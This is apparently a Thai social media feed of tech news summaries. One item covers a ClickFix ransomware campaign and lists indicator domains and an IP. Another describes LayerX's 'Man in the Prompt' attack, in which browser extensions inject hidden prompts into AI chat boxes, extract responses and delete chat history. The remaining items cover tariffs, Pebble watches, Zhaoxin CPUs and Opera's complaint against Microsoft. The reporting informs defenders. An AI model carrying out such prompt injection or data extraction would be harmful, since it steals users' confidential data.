โครงสร้างแคมเปญมีการปลอมตัวเป็นบริการยอดนิยมและใช้ IP/โดเมนเฉพาะในการโจมตี ➡️ เช่น twtich[.]cc, capchabot[.]cc และ IP 155.94.155.227:2269 ➡️ มีการใช้ Quasar RAT ร่วมด้วยในบางกรณี ‼️ ผู้ใช้ที่เปิดไฟล์ .HTA หรือใช้ Internet Explorer มีความเสี่ยงสูงมาก ⛔ ActiveX ยังเปิดใช้งานในบางระบบ Windows โดยไม่รู้ตัว ⛔ การรันคำสั่งผ่านเบราว์เซอร์สามารถหลบเลี่ยง SmartScreen และระบบป้องกันทั่วไป ‼️ องค์กรที่อนุญาตให้ใช้ปลั๊กอินเบราว์เซอร์หรือไม่จำกัดการเข้าถึงเว็บมีความเสี่ยงสูง ⛔ ผู้ใช้สามารถเข้าถึงหน้า ClickFix ปลอมและรันไฟล์ได้โดยไม่รู้ตัว ⛔ Endpoint อาจถูกเข้ารหัสและเรียกค่าไถ่ทันที ‼️ การใช้ social engineering แบบปลอมตัวเป็นบริการยอดนิยมทำให้ผู้ใช้ตกหลุมพรางง่ายขึ้น ⛔ ผู้ใช้เชื่อว่าเป็นการยืนยันตัวตนจริงจาก Discord หรือ Twitch ⛔ ไม่สงสัยว่าเป็นการโจมตีเพราะหน้าตาเว็บดูน่าเชื่อถือ ‼️ ระบบป้องกันแบบเดิมไม่สามารถตรวจจับการรันคำสั่งผ่าน ActiveX ได้ทันเวลา ⛔ การรันแบบเงียบไม่แสดงหน้าต่างหรือแจ้งเตือน ⛔ ไฟล์ถูกดาวน์โหลดและรันในหน่วยความจำโดยไม่มีร่องรอย https://hackread.com/onlyfans-discord-clickfix-pages-epsilon-red-ransomware/
    HACKREAD.COM
    OnlyFans, Discord ClickFix-Themed Pages Spread Epsilon Red Ransomware
    Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread
    0 ความคิดเห็น 0 การแบ่งปัน 96 มุมมอง 0 รีวิว
  • เรื่องเล่าจากข่าว: “Man in the Prompt” เมื่อ AI กลายเป็นผู้ช่วยโจรกรรมข้อมูล

    นักวิจัยจากบริษัท LayerX ค้นพบช่องโหว่ใหม่ที่เรียกว่า “Man in the Prompt” ซึ่งอาศัยความจริงที่ว่า ช่องใส่คำสั่ง (prompt input) ของ AI บนเว็บเบราว์เซอร์เป็นส่วนหนึ่งของโครงสร้างหน้าเว็บ (Document Object Model หรือ DOM) นั่นหมายความว่า ส่วนเสริมใด ๆ ที่เข้าถึง DOM ได้ ก็สามารถอ่านหรือเขียนคำสั่งลงในช่อง prompt ได้ทันที—even ถ้าไม่มีสิทธิ์พิเศษ!

    แฮกเกอร์สามารถใช้ส่วนเสริมที่เป็นอันตราย (หรือซื้อสิทธิ์จากส่วนเสริมที่มีอยู่แล้ว) เพื่อแอบแฝงคำสั่งลับ, ดึงข้อมูลจากคำตอบของ AI, หรือแม้แต่ลบประวัติการสนทนาเพื่อไม่ให้ผู้ใช้รู้ตัว

    LayerX ได้ทดลองโจมตีจริงกับ ChatGPT และ Google Gemini โดยใช้ส่วนเสริมที่ดูไม่มีพิษภัย แต่สามารถเปิดแท็บลับ, ส่งคำสั่งไปยัง AI, ดึงข้อมูลออก และลบหลักฐานทั้งหมด

    สิ่งที่น่ากลัวคือ AI เหล่านี้มักถูกใช้ในองค์กรเพื่อประมวลผลข้อมูลลับ เช่น เอกสารภายใน, แผนธุรกิจ, หรือรหัสโปรแกรม—ซึ่งอาจถูกขโมยไปโดยไม่รู้ตัว

    “Man in the Prompt” คือการโจมตีผ่านส่วนเสริมเบราว์เซอร์ที่แอบแฝงคำสั่งในช่อง prompt ของ AI
    ใช้ช่องโหว่ของ DOM ที่เปิดให้ส่วนเสริมเข้าถึงข้อมูลในหน้าเว็บ
    ไม่ต้องใช้สิทธิ์พิเศษก็สามารถอ่าน/เขียนคำสั่งได้

    AI ที่ได้รับผลกระทบ ได้แก่ ChatGPT, Gemini, Claude, Copilot และ Deepseek
    ทั้ง AI เชิงพาณิชย์และ AI ภายในองค์กร
    มีการทดสอบจริงและแสดงผลสำเร็จ

    ส่วนเสริมสามารถแอบส่งคำสั่ง, ดึงข้อมูล, และลบประวัติการสนทนาได้
    เช่น เปิดแท็บลับ, ส่งคำสั่งไปยัง ChatGPT, ดึงผลลัพธ์, แล้วลบแชท
    Gemini สามารถถูกโจมตีผ่าน sidebar ที่เชื่อมกับ Google Workspace

    ข้อมูลที่เสี่ยงต่อการรั่วไหล ได้แก่ อีเมล, เอกสาร, รหัส, แผนธุรกิจ และทรัพย์สินทางปัญญา
    โดยเฉพาะ AI ภายในองค์กรที่ฝึกด้วยข้อมูลลับ
    มีความเชื่อมั่นสูงแต่ขาดระบบป้องกันคำสั่งแฝง

    LayerX แนะนำให้ตรวจสอบพฤติกรรม DOM ของส่วนเสริมแทนการดูแค่สิทธิ์ที่ประกาศไว้
    ปรับระบบความปลอดภัยให้มองเห็นการเปลี่ยนแปลงใน DOM
    ป้องกันการแอบแฝงคำสั่งและการดึงข้อมูลแบบเรียลไทม์

    ส่วนเสริมที่ดูปลอดภัยอาจถูกแฮกหรือซื้อสิทธิ์ไปใช้โจมตีได้
    เช่น ส่วนเสริมที่มีฟีเจอร์จัดการ prompt อาจถูกใช้เพื่อแอบแฝงคำสั่ง
    ไม่ต้องมีการติดตั้งใหม่หรืออนุญาตใด ๆ จากผู้ใช้

    ระบบความปลอดภัยแบบเดิมไม่สามารถตรวจจับการโจมตีในระดับ DOM ได้
    เช่น DLP หรือ Secure Web Gateway ไม่เห็นการเปลี่ยนแปลงใน DOM
    การบล็อก URL ของ AI ไม่ช่วยป้องกันการโจมตีภายในเบราว์เซอร์

    องค์กรที่อนุญาตให้ติดตั้งส่วนเสริมอย่างเสรีมีความเสี่ยงสูงมาก
    พนักงานอาจติดตั้งส่วนเสริมที่เป็นอันตรายโดยไม่รู้ตัว
    ข้อมูลภายในองค์กรอาจถูกขโมยผ่าน AI ที่เชื่อมกับเบราว์เซอร์

    AI ที่ฝึกด้วยข้อมูลลับภายในองค์กรมีความเสี่ยงสูงสุด
    เช่น ข้อมูลทางกฎหมาย, การเงิน, หรือกลยุทธ์
    หากถูกดึงออกผ่าน prompt จะไม่มีทางรู้ตัวเลย

    https://hackread.com/browser-extensions-exploit-chatgpt-gemini-man-in-the-prompt/
    🧠 เรื่องเล่าจากข่าว: “Man in the Prompt” เมื่อ AI กลายเป็นผู้ช่วยโจรกรรมข้อมูล นักวิจัยจากบริษัท LayerX ค้นพบช่องโหว่ใหม่ที่เรียกว่า “Man in the Prompt” ซึ่งอาศัยความจริงที่ว่า ช่องใส่คำสั่ง (prompt input) ของ AI บนเว็บเบราว์เซอร์เป็นส่วนหนึ่งของโครงสร้างหน้าเว็บ (Document Object Model หรือ DOM) นั่นหมายความว่า ส่วนเสริมใด ๆ ที่เข้าถึง DOM ได้ ก็สามารถอ่านหรือเขียนคำสั่งลงในช่อง prompt ได้ทันที—even ถ้าไม่มีสิทธิ์พิเศษ! แฮกเกอร์สามารถใช้ส่วนเสริมที่เป็นอันตราย (หรือซื้อสิทธิ์จากส่วนเสริมที่มีอยู่แล้ว) เพื่อแอบแฝงคำสั่งลับ, ดึงข้อมูลจากคำตอบของ AI, หรือแม้แต่ลบประวัติการสนทนาเพื่อไม่ให้ผู้ใช้รู้ตัว LayerX ได้ทดลองโจมตีจริงกับ ChatGPT และ Google Gemini โดยใช้ส่วนเสริมที่ดูไม่มีพิษภัย แต่สามารถเปิดแท็บลับ, ส่งคำสั่งไปยัง AI, ดึงข้อมูลออก และลบหลักฐานทั้งหมด สิ่งที่น่ากลัวคือ AI เหล่านี้มักถูกใช้ในองค์กรเพื่อประมวลผลข้อมูลลับ เช่น เอกสารภายใน, แผนธุรกิจ, หรือรหัสโปรแกรม—ซึ่งอาจถูกขโมยไปโดยไม่รู้ตัว ✅ “Man in the Prompt” คือการโจมตีผ่านส่วนเสริมเบราว์เซอร์ที่แอบแฝงคำสั่งในช่อง prompt ของ AI ➡️ ใช้ช่องโหว่ของ DOM ที่เปิดให้ส่วนเสริมเข้าถึงข้อมูลในหน้าเว็บ ➡️ ไม่ต้องใช้สิทธิ์พิเศษก็สามารถอ่าน/เขียนคำสั่งได้ ✅ AI ที่ได้รับผลกระทบ ได้แก่ ChatGPT, Gemini, Claude, Copilot และ Deepseek ➡️ ทั้ง AI เชิงพาณิชย์และ AI ภายในองค์กร ➡️ มีการทดสอบจริงและแสดงผลสำเร็จ ✅ ส่วนเสริมสามารถแอบส่งคำสั่ง, ดึงข้อมูล, และลบประวัติการสนทนาได้ ➡️ เช่น เปิดแท็บลับ, ส่งคำสั่งไปยัง ChatGPT, ดึงผลลัพธ์, แล้วลบแชท ➡️ Gemini สามารถถูกโจมตีผ่าน sidebar ที่เชื่อมกับ Google Workspace ✅ ข้อมูลที่เสี่ยงต่อการรั่วไหล ได้แก่ อีเมล, เอกสาร, รหัส, แผนธุรกิจ และทรัพย์สินทางปัญญา ➡️ โดยเฉพาะ AI ภายในองค์กรที่ฝึกด้วยข้อมูลลับ ➡️ มีความเชื่อมั่นสูงแต่ขาดระบบป้องกันคำสั่งแฝง ✅ LayerX แนะนำให้ตรวจสอบพฤติกรรม DOM ของส่วนเสริมแทนการดูแค่สิทธิ์ที่ประกาศไว้ ➡️ ปรับระบบความปลอดภัยให้มองเห็นการเปลี่ยนแปลงใน DOM ➡️ ป้องกันการแอบแฝงคำสั่งและการดึงข้อมูลแบบเรียลไทม์ ‼️ ส่วนเสริมที่ดูปลอดภัยอาจถูกแฮกหรือซื้อสิทธิ์ไปใช้โจมตีได้ ⛔ เช่น ส่วนเสริมที่มีฟีเจอร์จัดการ prompt อาจถูกใช้เพื่อแอบแฝงคำสั่ง ⛔ ไม่ต้องมีการติดตั้งใหม่หรืออนุญาตใด ๆ จากผู้ใช้ ‼️ ระบบความปลอดภัยแบบเดิมไม่สามารถตรวจจับการโจมตีในระดับ DOM ได้ ⛔ เช่น DLP หรือ Secure Web Gateway ไม่เห็นการเปลี่ยนแปลงใน DOM ⛔ การบล็อก URL ของ AI ไม่ช่วยป้องกันการโจมตีภายในเบราว์เซอร์ ‼️ องค์กรที่อนุญาตให้ติดตั้งส่วนเสริมอย่างเสรีมีความเสี่ยงสูงมาก ⛔ พนักงานอาจติดตั้งส่วนเสริมที่เป็นอันตรายโดยไม่รู้ตัว ⛔ ข้อมูลภายในองค์กรอาจถูกขโมยผ่าน AI ที่เชื่อมกับเบราว์เซอร์ ‼️ AI ที่ฝึกด้วยข้อมูลลับภายในองค์กรมีความเสี่ยงสูงสุด ⛔ เช่น ข้อมูลทางกฎหมาย, การเงิน, หรือกลยุทธ์ ⛔ หากถูกดึงออกผ่าน prompt จะไม่มีทางรู้ตัวเลย https://hackread.com/browser-extensions-exploit-chatgpt-gemini-man-in-the-prompt/
    HACKREAD.COM
    Browser Extensions Can Exploit ChatGPT, Gemini in ‘Man in the Prompt’ Attack
    Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread
    0 ความคิดเห็น 0 การแบ่งปัน 98 มุมมอง 0 รีวิว
  • ประธานาธิบดีโดนัลด์ ทรัมป์ แห่งสหรัฐฯ กำหนดเพดานภาษีสูงลิ่วกับคู่หูการค้าหลายสิบชาติ ก่อนหน้าเส้นตายเจรจาการค้าที่กำหนดไว้ในวันศุกร์(1ส.ค.) ในนั้นรวมถึงแคนาดา 50%, บราซิล 25%, อินเดีย 20%, ไต้หวันกับสวิตเซอร์แลนด์ 39% ขณะที่ ไทย และ กัมพูชา 2 ชาติที่ถูกขู่ไม่เจรจาการค้าหากไม่ยุติการสู้รบ ได้รับการปรับลดเพดานภาษีเหลือ 19% เท่ากัน

    อ่านต่อ..https://news1live.com/detail/9680000072685

    #News1live #News1 #Sondhitalk #SondhiX #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire
    ประธานาธิบดีโดนัลด์ ทรัมป์ แห่งสหรัฐฯ กำหนดเพดานภาษีสูงลิ่วกับคู่หูการค้าหลายสิบชาติ ก่อนหน้าเส้นตายเจรจาการค้าที่กำหนดไว้ในวันศุกร์(1ส.ค.) ในนั้นรวมถึงแคนาดา 50%, บราซิล 25%, อินเดีย 20%, ไต้หวันกับสวิตเซอร์แลนด์ 39% ขณะที่ ไทย และ กัมพูชา 2 ชาติที่ถูกขู่ไม่เจรจาการค้าหากไม่ยุติการสู้รบ ได้รับการปรับลดเพดานภาษีเหลือ 19% เท่ากัน อ่านต่อ..https://news1live.com/detail/9680000072685 #News1live #News1 #Sondhitalk #SondhiX #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire
    Sad
    1
    0 ความคิดเห็น 0 การแบ่งปัน 326 มุมมอง 0 รีวิว
  • เรื่องเล่าจากข้อมืออดีต: Pebble กลับมาแล้ว พร้อมระบบเปิดและแบตเตอรี่ 30 วัน

    หลังจากหายไปเกือบ 10 ปี Eric Migicovsky ผู้ก่อตั้ง Pebble ได้เปิดตัวบริษัทใหม่ชื่อ Core Devices และประกาศว่าเขาได้ “ซื้อคืน” เครื่องหมายการค้า Pebble เพื่อใช้กับนาฬิกาอัจฉริยะรุ่นใหม่ที่พัฒนาบนระบบปฏิบัติการ PebbleOS แบบโอเพ่นซอร์ส

    นาฬิกาใหม่สองรุ่นคือ:
    - Pebble 2 Duo (เดิมชื่อ Core 2 Duo): หน้าจอขาวดำ e-paper ขนาด 1.26 นิ้ว, กันน้ำระดับ IPX8, มีไมค์และลำโพง, เซ็นเซอร์วัดความสูงและทิศทาง, แบตเตอรี่ใช้งานได้ 30 วัน
    - Pebble Time 2 (เดิมชื่อ Core Time 2): หน้าจอสี e-paper ขนาด 1.5 นิ้วแบบสัมผัส, ดีไซน์โลหะ, มีเซ็นเซอร์วัดหัวใจ, ไมค์และลำโพง, แบตเตอรี่ 30 วันเช่นกัน

    ทั้งสองรุ่นรองรับแอปและหน้าปัดกว่า 10,000 รายการจาก PebbleOS เดิม และสามารถปรับแต่งหรือพัฒนาเพิ่มเติมได้ด้วยซอฟต์แวร์โอเพ่นซอร์ส

    Pebble 2 Duo จะเริ่มจัดส่งปลายเดือนสิงหาคม 2025 (ล่าช้าจากกำหนดเดิมในเดือนกรกฎาคม) ส่วน Pebble Time 2 ยังอยู่ในขั้นตอนทดสอบ EVT และคาดว่าจะจัดส่งปลายปีนี้

    Pebble กลับมาอีกครั้งในปี 2025 โดยใช้ชื่อเดิมและระบบเดิม
    Eric Migicovsky ซื้อคืนเครื่องหมายการค้า Pebble
    เปิดตัวผ่านบริษัทใหม่ชื่อ Core Devices

    เปิดตัวนาฬิกาใหม่ 2 รุ่น: Pebble 2 Duo และ Pebble Time 2
    Pebble 2 Duo ราคา $149 พร้อมแบตเตอรี่ 30 วัน
    Pebble Time 2 ราคา $225 พร้อมหน้าจอสัมผัสและดีไซน์โลหะ

    ใช้ระบบปฏิบัติการ PebbleOS แบบโอเพ่นซอร์ส
    รองรับแอปและหน้าปัดกว่า 10,000 รายการ
    ผู้ใช้สามารถปรับแต่งหรือพัฒนาเพิ่มเติมได้เอง

    Pebble 2 Duo จะเริ่มจัดส่งปลายเดือนสิงหาคม 2025
    ล่าช้าจากกำหนดเดิมเพราะทดสอบระบบกันน้ำและลำโพง
    มี Bluetooth range ประมาณ 140 เมตรในพื้นที่เปิด

    Pebble Time 2 ยังอยู่ในขั้นตอน EVT และยังไม่มีกำหนดจัดส่ง
    ปรับดีไซน์ให้บางลงและดูทันสมัยขึ้น
    เพิ่มหน้าจอสัมผัสและเซ็นเซอร์วัดหัวใจ

    สามารถสั่งจองล่วงหน้าได้ผ่านเว็บไซต์ rePebble
    มีให้เลือกสีขาวและดำ พร้อมสายขนาดมาตรฐาน 22 มม.
    สินค้าจัดส่งจากฮ่องกง—สหรัฐฯ มีค่าภาษีเพิ่ม $10 ต่อเรือน

    https://www.techradar.com/health-fitness/smartwatches/the-all-new-pebble-watches-just-got-a-new-name-and-release-date-heres-how-to-get-one
    ⌚ เรื่องเล่าจากข้อมืออดีต: Pebble กลับมาแล้ว พร้อมระบบเปิดและแบตเตอรี่ 30 วัน หลังจากหายไปเกือบ 10 ปี Eric Migicovsky ผู้ก่อตั้ง Pebble ได้เปิดตัวบริษัทใหม่ชื่อ Core Devices และประกาศว่าเขาได้ “ซื้อคืน” เครื่องหมายการค้า Pebble เพื่อใช้กับนาฬิกาอัจฉริยะรุ่นใหม่ที่พัฒนาบนระบบปฏิบัติการ PebbleOS แบบโอเพ่นซอร์ส นาฬิกาใหม่สองรุ่นคือ: - Pebble 2 Duo (เดิมชื่อ Core 2 Duo): หน้าจอขาวดำ e-paper ขนาด 1.26 นิ้ว, กันน้ำระดับ IPX8, มีไมค์และลำโพง, เซ็นเซอร์วัดความสูงและทิศทาง, แบตเตอรี่ใช้งานได้ 30 วัน - Pebble Time 2 (เดิมชื่อ Core Time 2): หน้าจอสี e-paper ขนาด 1.5 นิ้วแบบสัมผัส, ดีไซน์โลหะ, มีเซ็นเซอร์วัดหัวใจ, ไมค์และลำโพง, แบตเตอรี่ 30 วันเช่นกัน ทั้งสองรุ่นรองรับแอปและหน้าปัดกว่า 10,000 รายการจาก PebbleOS เดิม และสามารถปรับแต่งหรือพัฒนาเพิ่มเติมได้ด้วยซอฟต์แวร์โอเพ่นซอร์ส Pebble 2 Duo จะเริ่มจัดส่งปลายเดือนสิงหาคม 2025 (ล่าช้าจากกำหนดเดิมในเดือนกรกฎาคม) ส่วน Pebble Time 2 ยังอยู่ในขั้นตอนทดสอบ EVT และคาดว่าจะจัดส่งปลายปีนี้ ✅ Pebble กลับมาอีกครั้งในปี 2025 โดยใช้ชื่อเดิมและระบบเดิม ➡️ Eric Migicovsky ซื้อคืนเครื่องหมายการค้า Pebble ➡️ เปิดตัวผ่านบริษัทใหม่ชื่อ Core Devices ✅ เปิดตัวนาฬิกาใหม่ 2 รุ่น: Pebble 2 Duo และ Pebble Time 2 ➡️ Pebble 2 Duo ราคา $149 พร้อมแบตเตอรี่ 30 วัน ➡️ Pebble Time 2 ราคา $225 พร้อมหน้าจอสัมผัสและดีไซน์โลหะ ✅ ใช้ระบบปฏิบัติการ PebbleOS แบบโอเพ่นซอร์ส ➡️ รองรับแอปและหน้าปัดกว่า 10,000 รายการ ➡️ ผู้ใช้สามารถปรับแต่งหรือพัฒนาเพิ่มเติมได้เอง ✅ Pebble 2 Duo จะเริ่มจัดส่งปลายเดือนสิงหาคม 2025 ➡️ ล่าช้าจากกำหนดเดิมเพราะทดสอบระบบกันน้ำและลำโพง ➡️ มี Bluetooth range ประมาณ 140 เมตรในพื้นที่เปิด ✅ Pebble Time 2 ยังอยู่ในขั้นตอน EVT และยังไม่มีกำหนดจัดส่ง ➡️ ปรับดีไซน์ให้บางลงและดูทันสมัยขึ้น ➡️ เพิ่มหน้าจอสัมผัสและเซ็นเซอร์วัดหัวใจ ✅ สามารถสั่งจองล่วงหน้าได้ผ่านเว็บไซต์ rePebble ➡️ มีให้เลือกสีขาวและดำ พร้อมสายขนาดมาตรฐาน 22 มม. ➡️ สินค้าจัดส่งจากฮ่องกง—สหรัฐฯ มีค่าภาษีเพิ่ม $10 ต่อเรือน https://www.techradar.com/health-fitness/smartwatches/the-all-new-pebble-watches-just-got-a-new-name-and-release-date-heres-how-to-get-one
    0 ความคิดเห็น 0 การแบ่งปัน 121 มุมมอง 0 รีวิว
  • เรื่องเล่าจากห้องแล็บจีน: Zhaoxin กับภารกิจไล่ตาม AMD ด้วย KH-50000 และ KX-7000N

    Zhaoxin เปิดตัวสองโปรเซสเซอร์ใหม่ในงาน WAIC 2025 ได้แก่:
    - Kaisheng KH-50000 สำหรับเซิร์ฟเวอร์ระดับสูง
    - KaiXian KX-7000N สำหรับ AI PC ที่มี NPU ในตัว

    KH-50000 เป็นรุ่นต่อยอดจาก KH-40000 โดยเพิ่มจำนวนคอร์จาก 32 เป็น 96 คอร์ พร้อม L3 cache ขนาด 384MB เทียบเท่ากับ AMD EPYC Genoa และรองรับ 128 PCIe 5.0 lanes กับหน่วยความจำ DDR5 แบบ 12-channel ECC

    แม้ Zhaoxin ยังไม่เปิดเผยสถาปัตยกรรมใหม่ที่ใช้ แต่จากการเปลี่ยนแปลงครั้งใหญ่ในสเปกและฟีเจอร์ คาดว่า KH-50000 ใช้สถาปัตยกรรมใหม่แทน Yongfeng เดิม และรองรับการเชื่อมต่อหลายซ็อกเก็ตผ่าน ZPI 5.0 ทำให้สามารถสร้างระบบที่มีสูงสุด 384 คอร์ได้

    ในฝั่งผู้บริโภค KX-7000N ถือเป็นชิปแรกของ Zhaoxin ที่มี NPU สำหรับงาน AI โดยอัปเกรดจาก PCIe 4.0 เป็น 5.0 และเพิ่มจำนวนคอร์จากรุ่นเดิม แม้ยังไม่เปิดเผยตัวเลขแน่ชัด

    Zhaoxin เปิดตัว KH-50000 สำหรับเซิร์ฟเวอร์ และ KX-7000N สำหรับ AI PC
    เปิดตัวในงาน WAIC 2025
    เป็นก้าวสำคัญของจีนในการลดการพึ่งพาเทคโนโลยีตะวันตก

    KH-50000 มี 96 คอร์, L3 cache 384MB, รองรับ 128 PCIe 5.0 lanes และ DDR5 แบบ 12-channel
    เทียบเท่า AMD EPYC Genoa ในหลายด้าน
    รองรับ Compute Express Link (CXL) และ ZPI 5.0 สำหรับ multi-socket

    KH-50000 ใช้สถาปัตยกรรมใหม่ที่ยังไม่เปิดเผย
    ไม่ใช่ Yongfeng แบบรุ่นก่อน
    คาดว่าออกแบบใหม่เพื่อรองรับงาน HPC และ AI

    KX-7000N เป็นชิปแรกของ Zhaoxin ที่มี NPU สำหรับงาน AI
    อัปเกรดจาก PCIe 4.0 เป็น 5.0
    เพิ่มจำนวนคอร์จากรุ่น KX-7000 เดิม

    Zhaoxin ตั้งเป้าแข่งขันกับ AMD, Intel และ Nvidia ในอนาคต
    ยังไม่เทียบเท่าในด้านประสิทธิภาพ แต่พัฒนาอย่างต่อเนื่อง
    มุ่งสู่ความเป็นอิสระทางเทคโนโลยีของจีน

    KH-50000 ยังไม่ยืนยันว่ารองรับ simultaneous multithreading (SMT)
    อาจมีข้อจำกัดด้านประสิทธิภาพต่อคอร์
    ยังไม่ชัดเจนว่ารองรับ workload แบบ multi-thread ได้ดีแค่ไหน

    ยังไม่มีข้อมูลด้านประสิทธิภาพจริงหรือ benchmark จาก Zhaoxin
    ไม่สามารถเปรียบเทียบกับ AMD หรือ Intel ได้อย่างแม่นยำ
    ต้องรอผลการทดสอบจากผู้ใช้งานจริง

    การพัฒนา NPU ใน KX-7000N ยังไม่มีข้อมูลด้านซอฟต์แวร์หรือ ecosystem รองรับ
    อาจมีข้อจำกัดในการใช้งาน AI บนเดสก์ท็อป
    ต้องพึ่งพาการพัฒนา framework และ driver เพิ่มเติม

    การผลิตและวางจำหน่ายยังไม่มีกำหนดแน่ชัด
    อาจล่าช้าหรือไม่สามารถผลิตได้ตามเป้า
    ส่งผลต่อการนำไปใช้งานในระดับองค์กรหรือผู้บริโภค

    https://www.tomshardware.com/pc-components/cpus/chinese-cpus-are-closing-the-gap-on-amd-next-gen-zhaoxin-chips-feature-96-cores-12-channel-ddr5-memory-and-128-pcie-5-0-lanes
    🧠 เรื่องเล่าจากห้องแล็บจีน: Zhaoxin กับภารกิจไล่ตาม AMD ด้วย KH-50000 และ KX-7000N Zhaoxin เปิดตัวสองโปรเซสเซอร์ใหม่ในงาน WAIC 2025 ได้แก่: - Kaisheng KH-50000 สำหรับเซิร์ฟเวอร์ระดับสูง - KaiXian KX-7000N สำหรับ AI PC ที่มี NPU ในตัว KH-50000 เป็นรุ่นต่อยอดจาก KH-40000 โดยเพิ่มจำนวนคอร์จาก 32 เป็น 96 คอร์ พร้อม L3 cache ขนาด 384MB เทียบเท่ากับ AMD EPYC Genoa และรองรับ 128 PCIe 5.0 lanes กับหน่วยความจำ DDR5 แบบ 12-channel ECC แม้ Zhaoxin ยังไม่เปิดเผยสถาปัตยกรรมใหม่ที่ใช้ แต่จากการเปลี่ยนแปลงครั้งใหญ่ในสเปกและฟีเจอร์ คาดว่า KH-50000 ใช้สถาปัตยกรรมใหม่แทน Yongfeng เดิม และรองรับการเชื่อมต่อหลายซ็อกเก็ตผ่าน ZPI 5.0 ทำให้สามารถสร้างระบบที่มีสูงสุด 384 คอร์ได้ ในฝั่งผู้บริโภค KX-7000N ถือเป็นชิปแรกของ Zhaoxin ที่มี NPU สำหรับงาน AI โดยอัปเกรดจาก PCIe 4.0 เป็น 5.0 และเพิ่มจำนวนคอร์จากรุ่นเดิม แม้ยังไม่เปิดเผยตัวเลขแน่ชัด ✅ Zhaoxin เปิดตัว KH-50000 สำหรับเซิร์ฟเวอร์ และ KX-7000N สำหรับ AI PC ➡️ เปิดตัวในงาน WAIC 2025 ➡️ เป็นก้าวสำคัญของจีนในการลดการพึ่งพาเทคโนโลยีตะวันตก ✅ KH-50000 มี 96 คอร์, L3 cache 384MB, รองรับ 128 PCIe 5.0 lanes และ DDR5 แบบ 12-channel ➡️ เทียบเท่า AMD EPYC Genoa ในหลายด้าน ➡️ รองรับ Compute Express Link (CXL) และ ZPI 5.0 สำหรับ multi-socket ✅ KH-50000 ใช้สถาปัตยกรรมใหม่ที่ยังไม่เปิดเผย ➡️ ไม่ใช่ Yongfeng แบบรุ่นก่อน ➡️ คาดว่าออกแบบใหม่เพื่อรองรับงาน HPC และ AI ✅ KX-7000N เป็นชิปแรกของ Zhaoxin ที่มี NPU สำหรับงาน AI ➡️ อัปเกรดจาก PCIe 4.0 เป็น 5.0 ➡️ เพิ่มจำนวนคอร์จากรุ่น KX-7000 เดิม ✅ Zhaoxin ตั้งเป้าแข่งขันกับ AMD, Intel และ Nvidia ในอนาคต ➡️ ยังไม่เทียบเท่าในด้านประสิทธิภาพ แต่พัฒนาอย่างต่อเนื่อง ➡️ มุ่งสู่ความเป็นอิสระทางเทคโนโลยีของจีน ‼️ KH-50000 ยังไม่ยืนยันว่ารองรับ simultaneous multithreading (SMT) ⛔ อาจมีข้อจำกัดด้านประสิทธิภาพต่อคอร์ ⛔ ยังไม่ชัดเจนว่ารองรับ workload แบบ multi-thread ได้ดีแค่ไหน ‼️ ยังไม่มีข้อมูลด้านประสิทธิภาพจริงหรือ benchmark จาก Zhaoxin ⛔ ไม่สามารถเปรียบเทียบกับ AMD หรือ Intel ได้อย่างแม่นยำ ⛔ ต้องรอผลการทดสอบจากผู้ใช้งานจริง ‼️ การพัฒนา NPU ใน KX-7000N ยังไม่มีข้อมูลด้านซอฟต์แวร์หรือ ecosystem รองรับ ⛔ อาจมีข้อจำกัดในการใช้งาน AI บนเดสก์ท็อป ⛔ ต้องพึ่งพาการพัฒนา framework และ driver เพิ่มเติม ‼️ การผลิตและวางจำหน่ายยังไม่มีกำหนดแน่ชัด ⛔ อาจล่าช้าหรือไม่สามารถผลิตได้ตามเป้า ⛔ ส่งผลต่อการนำไปใช้งานในระดับองค์กรหรือผู้บริโภค https://www.tomshardware.com/pc-components/cpus/chinese-cpus-are-closing-the-gap-on-amd-next-gen-zhaoxin-chips-feature-96-cores-12-channel-ddr5-memory-and-128-pcie-5-0-lanes
    0 ความคิดเห็น 0 การแบ่งปัน 103 มุมมอง 0 รีวิว
  • เรื่องเล่าจากเบราว์เซอร์: เมื่อ Opera ลุกขึ้นสู้กับ Edge เพื่อความเป็นธรรมในการแข่งขัน

    ในเดือนกรกฎาคม 2025 Opera ได้ยื่นคำร้องต่อ CADE (หน่วยงานกำกับดูแลการแข่งขันของบราซิล) โดยกล่าวหาว่า Microsoft ใช้ “กลยุทธ์การออกแบบที่ชักจูง” หรือที่เรียกว่า dark patterns เพื่อผลักดันให้ผู้ใช้ Windows ใช้ Edge เป็นเบราว์เซอร์หลัก ทั้งที่ผู้ใช้ตั้งค่าเบราว์เซอร์อื่นไว้แล้ว

    Opera ระบุว่า Microsoft:
    - ให้แรงจูงใจแก่ผู้ผลิตคอมพิวเตอร์ (OEMs) เพื่อให้ติดตั้ง Edge เป็นค่าเริ่มต้น
    - ไม่เปิดโอกาสให้เบราว์เซอร์อื่น เช่น Opera ได้รับการติดตั้งล่วงหน้า
    - ใช้เครื่องมือในระบบ เช่น Widgets, Teams, Search และ Outlook เปิดลิงก์ผ่าน Edge โดยไม่สนใจการตั้งค่าของผู้ใช้
    - แสดงข้อความรบกวนเมื่อผู้ใช้พยายามดาวน์โหลดเบราว์เซอร์อื่น

    Opera หวังว่าบราซิลจะเป็นตัวอย่างให้ประเทศอื่นดำเนินการตาม และเรียกร้องให้ Microsoft ยุติการใช้กลยุทธ์เหล่านี้ พร้อมเปิดโอกาสให้ผู้ใช้เลือกเบราว์เซอร์ได้อย่างเสรี

    Opera ยื่นคำร้องต่อ CADE ในบราซิล กล่าวหา Microsoft ใช้กลยุทธ์ไม่เป็นธรรมเพื่อผลักดัน Edge
    เป็นการฟ้องร้องในตลาดสำคัญของ Opera ซึ่งมีผู้ใช้จำนวนมาก
    หวังให้บราซิลเป็นแบบอย่างระดับโลกในการควบคุม Big Tech

    Microsoft ถูกกล่าวหาว่าใช้ “manipulative design tactics” และ “dark patterns” ใน Windows
    เช่น การเปิดไฟล์ PDF ผ่าน Edge แม้ผู้ใช้ตั้งค่าเบราว์เซอร์อื่น
    การแสดงข้อความรบกวนเมื่อพยายามดาวน์โหลดเบราว์เซอร์คู่แข่ง

